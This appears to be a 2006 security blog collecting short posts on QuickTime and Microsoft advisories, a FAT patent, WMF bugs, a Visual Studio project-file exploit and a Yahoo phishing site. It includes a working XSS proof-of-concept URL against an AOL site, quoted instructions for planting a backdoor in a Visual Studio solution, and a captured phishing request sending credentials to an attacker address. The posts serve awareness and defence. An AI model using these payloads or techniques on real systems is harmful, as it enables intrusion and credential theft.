For those using Mozilla Thunderbird, the 1.5 version is now
available for download at their official site.
eEye Digital Security has published four (4) advisories related to Apple Quicktime vulnerabilities. These vulnerabilities were marked as critical because they can cause remote arbitrary code execution. In effect, the attacker can control the affected system with the same privileges as the logged in user.
The following vulnerabilities are enumerated below with some short description.
Apple QuickTime STSD Atom Heap Overflow
The vulnerability allows a remote attacker to reliably overwrite heap memory with user-controlled data and execute arbitrary code in the context of the user who executed the player or application hosting the QuickTime plug-in.
Apple iTunes (QuickTime.qts) Heap Overflow
The vulnerability allows an attacker to reliably overwrite heap memory with user-controlled data and execute arbitrary code in the context of the user who executed iTunes.
Apple QuickTime QTIF Stack Overflow
There is a stack overflow in the way QuickTime processes qtif format files. An attacker can create a qtif file and send it to the user via email, web page, or qtif file with activex and can directy overflow a function pointer immediately used so it can bypass any stack overflow protection in systems such as xp sp2 and 2003 sp1.
Apple QuickTime Malformed GIF Heap Overflow
…a critical heap overflow in the Apple Quicktime player that allows for the execution of arbitrary code via a maliciously crafted GIF file.
This flaw has proven to allow for reliable control of data on the heap chunk and can be exploited via a web site by using ActiveX controls.
The following systems are affected by these vulnerabilities.
- Quicktime on Windows 2000
- Quicktime on Windows XP
- Quicktime on Mac OS X 10.3.9
- Apple iTunes on Windows 2000
- Apple iTunes on Windows XP
- Apple iTunes on OS X 10.3.9
Apple has released Apple QuickTime version 7.0.4 to solve these vulnerabilities. Mac OS X users should update their software by following the steps described in Apple’s web site. Windows 2000 and XP users should download Apple QuickTime 7.0.4.
By the way, the advisories were released the same date as Microsoft did on their latest security updates
続きを読む
The File Allocation Table (FAT) file system is now patented to Microsoft. This file storage system was originally developed for DOS and has been acquired in Windows Operating Systems. FAT is also being used in Digital Camera’s memory cards, flash disks and some Linux/UNIX – related products that exchange data with Windows.
After getting the patent, The Giant is now concerned of asking for royalties to all distributors of firmware and software that uses the said technology. This imposes a threat to the Free Software Community.
続きを読む
A Security Researcher from MorX found multiple AOL web sites that are prone to Cross site-scripting exploits. The attacker can execute almost any scripts. Here’s a proof of concept:
- http://www.aim.com/<BLOCKED>?aolp=%22
%3E%3Cscript%3Ealert(‘Hello%20World’)%3C/script%3E
When you click on the link above, it will display a message box saying “Hello World”. You will have to click the OK button before the message totally disappear. Or you can terminate the IE thru your task manager.
To protect you from this type of attacks, you may set your IE’s security settings to High. Here’s how:
- Go to Control Panel and double-click Internet Options.
- Click on Security Tab
- Click on the Internet with a globe icon.
- Move the slider up to High
- Click Apply button then click Ok.
続きを読む
A vulnerability found in Microsoft’s Visual Studio can allow
code execution. Well, the catch is even the “source code” of a
project can have hidden executable codes in them. An exploit from a
Security Group called Priestmasters proves this claim. More details
found in Securiteam web page.
I tested the proof of concept from Priestmasters on Microsoft
Visual C# 2005 Express Edition Beta and it worked.
“If a user click on the solution file
(vbexploit.sln) and the form1.cs is shown, VS launch the code
inside UserControl1_Load function. Place your backdoor into this
function (You can use the whole WIN-API and .NET framework to code
your back door). The default behavior for the example file is show
a Message Box and launch calc.exe.”
Now upon double clicking the said solution file, a message box
was displayed as shown below. (click on image to enlarge)
Clicking on “OK” button launches “calc.exe”. (Click on image to
enlarge)
There are many options an attacker can choose from when he
exploits the said vulnerability. The attacker may install a
backdoor, spyware, or even a worm in the affected machine. Yet,
there are no known security patch available to address the said
vulnerability so users are advised not to trust unsolicited or
unexpected source files of Visual Studio from unknown and known
contacts. If the source files were downloaded from the Internet, it
is recommend to test or open them first on test machines not
connected into your network to avoid any circumstances of a malware
oubreak in your network.
Microsoft released additional two security bulletins for this month. These are tagged critical since remote code execution is possible when the vulnerability is successfully exploited. More details can be found at Microsoft’s pages. (click on each link below)
“A remote code execution vulnerability exists in Windows because of the way that it handles malformed embedded Web fonts. An attacker could exploit the vulnerability by constructing a malicious embedded Web font that could potentially allow remote code execution if a user visited a malicious Web site or viewed a specially crafted e-mail message. An attacker who successfully exploited this vulnerability could take complete control of an affected system.”
“A remote code execution vulnerability exists in Microsoft Outlook and Microsoft Exchange Server because of the way that it decodes the Transport Neutral Encapsulation Format (TNEF) MIME attachment.”
“An attacker could exploit the vulnerability by constructing a specially crafted TNEF message that could potentially allow remote code execution when a user opens or previews a malicious e-mail message or when the Microsoft Exchange Server Information Store processes the specially crafted message.”
“An attacker who successfully exploited this vulnerability could take complete control of an affected system.”
Users are encouraged to patch their machines immediately to avoid possible attacks from malicious users using the said vulnerabilities. You can get MS patches by visiting Microsoft Update and Office Update. (Note: for Firefox browser users, Internet Explorer must be used when going to Microsoft update) =)
続きを読む
Microsoft Windows GRE WMF Format Multiple Memory Overrun
Vulnerabilities.
Two new vulnerabilities have been found in the Microsoft Windows
Graphics Rendering Engine (GRE). This is related to the previous
WMF vulnerability but this time it causes Denial of Service (DOS)
and not remote code execution and may also restart the explorer.exe
process. These vulnerabilities can be triggered by viewing
specially crafted .wmf files.
These two new vulnerabilities are not addressed in the MS06-001
Security Update so all products listed below is affected by the
bugs.
- Microsoft Windows XP SP2
- Microsoft Windows XP SP1
- Microsoft Windows Server 2003 SP1
- Microsoft Windows Server 2003
- Microsoft Windows ME
- Microsoft Windows 98se
- Microsoft Windows 98
- Microsoft Windows 2000 SP4
But, according to Lennart Wistrand of Microsoft, these are just
Windows performance issues and are not really exploitable and do
not allow the attacker to execute arbitrary code nor crash the
underlying affected OS. He also stated that, they have ongoing code
maintenance and will be release on the next service pack of the
affected products.
Since, there are no patches yet that addresses these bugs, the
workaround for the previous WMF vulnerability is still applicable.
The steps are enumerated below to unregister the Windows Picture
and Fax Viewer (Shimgvw.dll).
- Go to start then click on “Run”
- Type “cmd” or “command” to open the command prompt console
- Type “regsvr32 -u %systemdir%shimgvw.dll” in the command
prompt.
References :
http://www.securityfocus.com/archive/1/421257
http://blogs.technet.com/msrc/archive/2006/01/09/417198.aspx
Note :
Two crafted .wmf samples have been out from the internet that
exploit the said vulnerabilities and have been given the detection
names TROJ_WMFCRASH.B and TROJ_WMFCRASH.C.
%systemdir% is usually C:windowssystem (98 and ME) or
C:windowssystem32 (XP) or C:winntsystem32 (2000).
続きを読む
Just after I finished reading a story of a hacker who hacked a lot of .gov.ph sites, my previous shiftmate popped me a message on a Yahoo Messenger. He asked me if we got new IM Worm samples that uses Yahoo Messenger. I told him none, not even a sample from SOBER.AG anniv links, then he immediately popped me the link http://www.<BLOCKED>.com/x0x_welcome_2006_x0x/. He told me that his friend popped him that link. Below is the snapshot of their correspondence in YM:
And below is the screenshot of the Yahoo Phishing site:
Here we are again, reminding Internet users to be cautious on the links that are visiting. As we can see on the image, the site is pretending to be a Yahoo Photo site, but the URL says it is a Geocities link. Always think twice before giving out any username and passwords on a website.
I sniffed the packet, to find out where the Yahoo account credentials will be sent to:
POST /form/mailto.cgi HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-
powerpoint, application/msword, */*
Referer: http://www.<BLOCKED>.com/x0x_welcome_2006_x0x/?20068
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Host: www2.<BLOCKED>.net
Content-Length: 175
Connection: Keep-Alive
Cache-Control: no-cache
Mail_From=Yahoo&Mail_To=<BLOCKED>.@yahoo.com&Mail_Subject=Yahoo+id&
Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos&login=
qwerty&passwd=asdf&.save=Sign+InHTTP/1.1 302 Found
Date: Sun, 08 Jan 2006 00:43:46 GMT
Server: Apache/1.3.26 (Unix) mod_perl/1.26
Location: http://photos.yahoo.com/ph//my_photos
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
As we can see, the Yahoo credentials is being sent to
<BLOCKED>.@yahoo.com
続きを読む